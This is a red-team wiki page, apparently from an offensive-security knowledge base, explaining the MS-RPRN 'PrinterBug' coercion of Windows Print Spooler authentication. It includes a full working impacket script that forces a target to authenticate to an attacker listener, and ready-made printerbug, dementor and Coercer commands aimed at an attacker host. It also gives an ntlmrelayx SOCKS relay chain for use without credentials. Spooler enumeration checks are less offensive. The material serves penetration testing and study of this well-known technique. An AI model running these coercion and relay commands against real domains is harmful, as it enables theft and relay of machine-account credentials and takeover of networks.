# MS-RPRN abuse (PrinterBug)

## Theory

Microsoft's Print Spooler is a service that handles print jobs and other printing-related tasks. An attacker controlling a domain user or computer account can, with a specific RPC call, make the spooler service of any target running it authenticate to a host of the attacker's choosing. Because the spooler runs as SYSTEM, that authentication is performed with the target's machine account. Microsoft treats this behavior as "won't fix", and the spooler is enabled by default on Windows hosts, domain controllers included ([more info on the finding](https://fr.slideshare.net/harmj0y/derbycon-the-unintended-risks-of-trusting-active-directory/47)).

**The coerced authentications are made over SMB**. But MS-RPRN abuse can be combined with [WebClient abuse](https://red.infiltr8.io/ad/movement/mitm-and-coerced-authentications/webclient) to elicit incoming authentications made over HTTP which heightens [NTLM relay](https://red.infiltr8.io/ad/movement/ntlm/relay) capabilities.

The "specific call" mentioned above is `RpcRemoteFindFirstPrinterChangeNotificationEx`, a notification method of the MS-RPRN protocol: the caller asks the print server to deliver printer-change notifications to a machine it names (the `pszLocalMachine` parameter), and the print server connects to that machine to do so. MS-RPRN is Microsoft's Print System Remote Protocol. It defines the communication of print job processing and print system management between a print client and a print server.
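The call sequence described above, as an added example built on impacket's `rprn` module. This is not printerbug.py's or Coercer's code: the `coerce_spooler()` helper, the host names and the outcome strings are assumptions of this example, while the impacket calls (`hRpcOpenPrinter`, `hRpcRemoteFindFirstPrinterChangeNotificationEx`) and the MS-RPRN constants are the library's own.

```python
"""Coerce a target's Print Spooler into authenticating to a listener via MS-RPRN.

Added example (not printerbug.py's or Coercer's code): it reproduces the call
sequence described above with impacket's rprn module. The coerce_spooler()
helper, host names and outcome strings are assumptions of this example.
"""
import sys

# MS-RPRN is reached over SMB through the spoolss named pipe on the IPC$ share.
SPOOLSS_PIPE = r"\PIPE\spoolss"


def spoolss_binding(target):
    """Build the DCE/RPC string binding for the spooler pipe on TARGET."""
    return r"ncacn_np:%s[%s]" % (target, SPOOLSS_PIPE)


def unc_host(host):
    """MS-RPRN server names are NUL-terminated UNC names, e.g. '\\\\DC01\\x00'."""
    return "\\\\%s\x00" % host


def coerce_spooler(target, listener, domain, username, password="", nthash=""):
    """Open the print server on TARGET and ask it to send change notifications
    to LISTENER. To fulfil the request the target's spooler (running as SYSTEM,
    hence authenticating as the machine account) connects to \\\\LISTENER over
    SMB. Returns a short description of the outcome.
    """
    # Imported here so the pure helpers above stay usable without impacket.
    from impacket.dcerpc.v5 import rprn, transport
    from impacket.dcerpc.v5.dtypes import NULL

    rpctransport = transport.DCERPCTransportFactory(spoolss_binding(target))
    rpctransport.set_credentials(username, password, domain, "", nthash)
    dce = rpctransport.get_dce_rpc()
    dce.connect()                   # SMB session, IPC$ tree connect, \PIPE\spoolss
    dce.bind(rprn.MSRPC_UUID_RPRN)  # bind to the MS-RPRN interface

    # RpcOpenPrinter on the server itself (not on a printer) returns a handle
    # that is sufficient for the notification call.
    resp = rprn.hRpcOpenPrinter(dce, unc_host(target))
    handle = resp["pHandle"]
    try:
        # pszLocalMachine is the host the spooler will call back: this is the
        # attacker-controlled value that makes the coercion possible.
        rprn.hRpcRemoteFindFirstPrinterChangeNotificationEx(
            dce, handle, rprn.PRINTER_CHANGE_ADD_JOB,
            pszLocalMachine=unc_host(listener), pOptions=NULL)
        return "notification request accepted"
    except Exception as exc:  # impacket raises DCERPCException subclasses
        # The spooler reports an error once its callback to LISTENER fails
        # (no spooler answers there); the SMB authentication has already happened.
        if "RPC_S_SERVER_UNAVAILABLE" in str(exc):
            return "target tried to reach listener (RPC_S_SERVER_UNAVAILABLE)"
        raise
    finally:
        dce.disconnect()


if __name__ == "__main__":
    if len(sys.argv) != 6:
        sys.exit("usage: coerce_spooler.py TARGET LISTENER DOMAIN USER PASSWORD")
    print(coerce_spooler(*sys.argv[1:6]))
```

Run it with a listener such as `ntlmrelayx.py` or Responder already waiting on the attacker host; the `RPC_S_SERVER_UNAVAILABLE` outcome is the expected one when the attacker host runs no spooler of its own, and it still means the target authenticated to the listener.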

{% hint style="info" %}
The attacker needs a foothold on the domain (i.e. a compromised account, or a relayed authentication) for this attack to work, since the coercion is operated through an RPC call over the SMB `\pipe\spoolss` named pipe, reached through the `IPC$` share, which only authenticated sessions can open.
{% endhint %}

## Practice

Remotely checking if the spooler is available can be done with [SpoolerScanner](https://github.com/vletoux/SpoolerScanner) (PowerShell) or with [rpcdump](https://github.com/SecureAuthCorp/impacket/blob/master/examples/rpcdump.py) (Python). rpcdump queries the endpoint mapper (TCP/135), which answers without credentials, so this check works before any account is compromised.

The spooler service can be triggered with [printerbug](https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py) or [SpoolSample](https://github.com/leechristensen/SpoolSample) (C#). There are many alternatives available publicly on the Internet.

{% tabs %}
{% tab title="Enumerate" %}
**rpcdump**

We can check if the spooler service is available on a target using [rpcdump.py](https://github.com/fortra/impacket/blob/master/examples/rpcdump.py) from impacket.

```bash
rpcdump.py $TARGET | grep -A 6 "spoolsv"
```
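When many hosts are scanned, grepping rpcdump output by hand does not scale. The following parser is an added example (not part of the page or of impacket) that turns rpcdump.py output into records and reports whether MS-RPRN is exposed, and on which binding. The record layout (`Protocol` / `Provider` / `UUID` / `Bindings` lines) mirrors what rpcdump.py prints; the sample outputs embedded below are constructed, and the host, addresses and non-spooler UUID in them are invented.

```python
"""Parse rpcdump.py output and report whether MS-RPRN (the spooler) is reachable.

Added example, not part of the page or of impacket. The record layout mirrors
rpcdump.py's output; the sample outputs below are constructed and their hosts,
addresses and non-spooler UUID are invented.
"""
import re
import sys

# Interface UUID of MS-RPRN (Print System Remote Protocol), version 1.0.
MS_RPRN_UUID = "12345678-1234-abcd-ef00-0123456789ab"
SPOOLSS_PIPE = r"\pipe\spoolss"
UUID_RE = re.compile(r"([0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12})\s+v([\d.]+)", re.I)
BINDING_RE = re.compile(r"^(ncacn_|ncadg_|ncalrpc)")

# Constructed rpcdump.py output for a host whose spooler is running.
SAMPLE_SPOOLER_UP = r"""
Protocol: N/A
Provider: N/A
UUID    : 0AA0C3F1-3D2E-4F4B-9A6C-1B2C3D4E5F60 v1.0
Bindings:
          ncacn_ip_tcp:10.0.0.5[49664]

Protocol: [MS-RPRN]: Print System Remote Protocol
Provider: spoolsv.exe
UUID    : 12345678-1234-ABCD-EF00-0123456789AB v1.0
Bindings:
          ncacn_ip_tcp:10.0.0.5[49672]
          ncacn_np:\\DC01[\pipe\spoolss]
          ncalrpc:[spoolss]
"""

# Same host with the spooler stopped: the MS-RPRN record is simply absent.
SAMPLE_SPOOLER_DOWN = r"""
Protocol: N/A
Provider: N/A
UUID    : 0AA0C3F1-3D2E-4F4B-9A6C-1B2C3D4E5F60 v1.0
Bindings:
          ncacn_ip_tcp:10.0.0.5[49664]
"""


def parse_rpcdump(output):
    """Split rpcdump.py output into interface records.

    Each record is a dict with protocol, provider, uuid (lower-cased), version
    and the list of binding strings registered for that interface.
    """
    records, current = [], None
    for raw in output.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("Protocol:"):
            current = {"protocol": line.split(":", 1)[1].strip(), "provider": None,
                       "uuid": None, "version": None, "bindings": []}
            records.append(current)
        elif current is None:
            continue  # stray text before the first record
        elif line.startswith("Provider:"):
            current["provider"] = line.split(":", 1)[1].strip()
        elif line.startswith("UUID"):
            m = UUID_RE.search(line)
            if m:
                current["uuid"], current["version"] = m.group(1).lower(), m.group(2)
        elif BINDING_RE.match(line):
            current["bindings"].append(line)
    return records


def spooler_endpoints(output):
    """Return the remotely reachable bindings that expose MS-RPRN.

    ncalrpc bindings are local-only and dropped; what remains is what an
    attacker can bind to (TCP endpoints or the spoolss named pipe over SMB).
    """
    endpoints = []
    for rec in parse_rpcdump(output):
        if rec["uuid"] == MS_RPRN_UUID:
            endpoints.extend(b for b in rec["bindings"] if not b.startswith("ncalrpc:"))
    return endpoints


def spooler_pipe_exposed(output):
    """True when MS-RPRN is reachable through \\pipe\\spoolss, the path the coercion uses."""
    return any(SPOOLSS_PIPE in b.lower() for b in spooler_endpoints(output))


if __name__ == "__main__":
    # Usage: rpcdump.py $TARGET | python3 spooler_check.py
    data = sys.stdin.read()
    for ep in spooler_endpoints(data):
        print("MS-RPRN:", ep)
    print("spoolss pipe exposed:", spooler_pipe_exposed(data))
```

Feeding `rpcdump.py $TARGET` into the script on stdin gives a yes/no answer per host; checking the UUID rather than the `spoolsv` provider string keeps the check working when rpcdump does not know the interface name.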

**NetExec**

[NetExec](https://github.com/Pennyw0rth/NetExec) (Python) can be used to check if the spooler service is running.

```bash
netexec smb <TARGET> -u <USER> -p <PASSWORD> -M spooler
netexec smb <TARGET> -u <USER> -p <PASSWORD> --local-auth -M spooler
```

**SpoolerScanner**

Check if the spooler service is available (from a Windows host) using [SpoolerScanner](https://github.com/vletoux/SpoolerScanner) (PowerShell)

```powershell
.\SpoolerScan.ps1
```

{% endtab %}

{% tab title="Exploit" %}
**PrinterBug**

Using [printerbug](https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py) (Python) we can trigger the spooler to authenticate against our controlled server.

```bash
printerbug.py 'DOMAIN'/'USER':'PASSWORD'@'TARGET' 'ATTACKER HOST'
```

**Dementor**

Using [dementor](https://github.com/NotMedic/NetNTLMtoSilverTicket/blob/master/dementor.py) (Python) we can trigger the spooler to authenticate against our controlled server.

```bash
python dementor.py -d $DOMAIN -u $USERNAME -p $PASSWORD $ATTACKER_IP $TARGET_IP
```

**Coercer**

Yet another alternative is the [Coercer](https://github.com/p0dalirius/Coercer/tree/master) tool (Python), which can be restricted to the MS-RPRN protocol or to the single method of interest as follows.

```bash
# Coerce
coercer coerce -u $USER -p $PASSWORD -d $DOMAIN --filter-protocol-name MS-RPRN -l $ATTACKER_IP -t $TARGET_IP

# Coerce a specific method
coercer coerce -u $USER -p $PASSWORD -d $DOMAIN --filter-method-name RpcRemoteFindFirstPrinterChangeNotificationEx -l $ATTACKER_IP -t $TARGET_IP
```

{% endtab %}

{% tab title="ntlmrelayx" %}
In the situation where the tester doesn't have any credentials, it is still possible to [relay an authentication](https://red.infiltr8.io/ad/movement/ntlm/relay) to the target's SMB service and keep the relayed session open as a SOCKS proxy; printerbug.py is then run through that proxy with `-no-pass`, the relayed session supplying the authentication. The `USER` given to printerbug.py must be the account whose authentication was relayed, and the target must not require SMB signing.

```bash
ntlmrelayx.py -t smb://$TARGET -socks
proxychains printerbug.py -no-pass 'DOMAIN'/'USER'@'TARGET' 'ATTACKER HOST'
```

{% endtab %}
{% endtabs %}

{% hint style="info" %}
**Nota bene**: coerced NTLM authentications made over SMB restrict the possibilities of [NTLM relay](https://red.infiltr8.io/ad/movement/ntlm/relay), because the SMB client negotiates signing in its NTLM messages. For instance, an "unsigning cross-protocols relay attack" from SMB to LDAP will only be possible if the target is vulnerable to CVE-2019-1040 or CVE-2019-1166.
{% endhint %}

## Resources

{% embed url="https://www.harmj0y.net/blog/redteaming/not-a-security-boundary-breaking-forest-trusts/" %}
